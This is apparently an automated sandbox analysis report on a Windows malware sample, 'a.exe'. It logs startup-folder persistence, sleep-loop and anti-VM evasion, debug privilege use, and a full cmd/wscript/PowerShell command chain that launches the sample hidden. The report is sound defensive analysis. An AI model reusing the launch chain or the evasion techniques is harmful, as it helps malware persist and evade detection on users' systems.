Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10800000
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10799657
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10799391
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10799266
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10799141
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10798860
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10798704
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10798594
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10798438
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10798297
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10798079
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10797907
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10797704
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10797500
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10797204
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10796750
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10796500
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10796313
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10796110
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10795954
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10795813
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10795500
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10795360
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10795204
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10795063
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10794907
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10794750
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10794610
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10794485
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10794344
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10794063
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10793954
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10789125
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10789016
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10788907
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10788750
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10788641
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10788500
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10788391
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10788250
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 922337203685477
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1905 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 833 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Window / User API: threadDelayed 3271
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Window / User API: threadDelayed 5739
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6676 Thread sleep count: 1905 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6736 Thread sleep count: 833 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6692 Thread sleep count: 43 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3040 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6724 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 4928 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 584 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -21213755684765971s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10800000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10799657s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10799391s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10799266s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10799141s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10798860s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10798704s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10798594s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10798438s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10798297s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10798079s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10797907s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10797704s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10797500s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10797204s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10796750s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10796500s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10796313s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10796110s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10795954s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10795813s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10795500s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10795360s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10795204s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10795063s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10794907s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10794750s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10794610s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10794485s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10794344s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10794063s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10793954s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -99859s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -99750s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -99640s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -99531s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -99422s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -99312s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -99203s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -99094s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -98984s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -98875s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -98765s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -98640s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -98515s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -98406s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -98281s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -98125s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -98015s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -97906s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -97797s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -97687s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -97578s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -97469s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -97359s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -97250s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -97125s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -97015s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -96906s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -96797s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -96640s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -96531s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -96422s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -96312s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -96203s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -96094s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -95953s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -95844s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -95703s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -95594s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -95484s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -95375s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10789125s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10789016s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10788907s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10788750s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10788641s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10788500s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10788391s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10788250s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 5676 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 6884 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 5464 Thread sleep time: -922337203685477s >= -30000s
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM WIN32_PROCESSOR
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\ Jump to behavior
Source: powershell.exe, 0000000A.00000002.823826919.0000000005038000.00000004.00000001.sdmp Binary or memory string: Hyper-V
Source: powershell.exe, 0000000A.00000002.823826919.0000000005038000.00000004.00000001.sdmp Binary or memory string: e:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: a.exe, 00000001.00000002.715744246.00000000072C0000.00000002.00000001.sdmp, a.exe, 0000000B.00000002.787547923.0000000006A00000.00000002.00000001.sdmp, a.exe, 00000011.00000002.873462654.0000000006F20000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: a.exe, 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp Binary or memory string: vmware
Source: a.exe, 00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp Binary or memory string: EnableAntiVMware
Source: a.exe, 00000001.00000002.715744246.00000000072C0000.00000002.00000001.sdmp, a.exe, 0000000B.00000002.787547923.0000000006A00000.00000002.00000001.sdmp, a.exe, 00000011.00000002.873462654.0000000006F20000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: a.exe, 00000001.00000002.715744246.00000000072C0000.00000002.00000001.sdmp, a.exe, 0000000B.00000002.787547923.0000000006A00000.00000002.00000001.sdmp, a.exe, 00000011.00000002.873462654.0000000006F20000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: a.exe, 00000001.00000002.708980355.0000000000B2E000.00000004.00000020.sdmp, a.exe, 0000000B.00000002.771565710.0000000000DC7000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: a.exe, 00000001.00000002.715744246.00000000072C0000.00000002.00000001.sdmp, a.exe, 0000000B.00000002.787547923.0000000006A00000.00000002.00000001.sdmp, a.exe, 00000011.00000002.873462654.0000000006F20000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: a.exe, 00000011.00000002.839119724.0000000000C8A000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllNN
Source: C:\ProgramData\a.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Enables debug privileges
Source: C:\ProgramData\a.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process token adjusted: Debug
Source: C:\ProgramData\a.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
.NET source code references suspicious native API functions
Source: 13.2.a.exe.400000.0.unpack, CC2/LCs.cs Reference to suspicious API methods: ('WXK', 'VirtualProtect@kernel32'), ('LXr', 'GetProcAddress@kernel32'), ('lXy', 'LoadLibrary@kernel32')
Source: 13.2.a.exe.400000.0.unpack, oXs/KX8.cs Reference to suspicious API methods: ('EBg', 'GetProcAddress@kernel32'), ('UBW', 'LoadLibrary@kernel32')
Source: 13.2.a.exe.400000.0.unpack, DCX/jCC.cs Reference to suspicious API methods: ('FCK', 'MapVirtualKey@user32.dll')
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 4 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe' Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe' Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c timeout 4 & 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js' && powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
Source: C:\ProgramData\a.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c timeout 4 & 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js' && powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe' Jump to behavior
Source: a.exe, 0000000D.00000002.952262097.0000000001730000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: a.exe, 0000000D.00000002.952262097.0000000001730000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: a.exe, 0000000D.00000002.952262097.0000000001730000.00000002.00000001.sdmp Binary or memory string: Progman
Source: a.exe, 0000000D.00000002.952262097.0000000001730000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the product ID of Windows
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
Queries the volume information (name, serial number etc) of a device
Source: C:\ProgramData\a.exe Queries volume information: C:\ProgramData\a.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation Jump to behavior
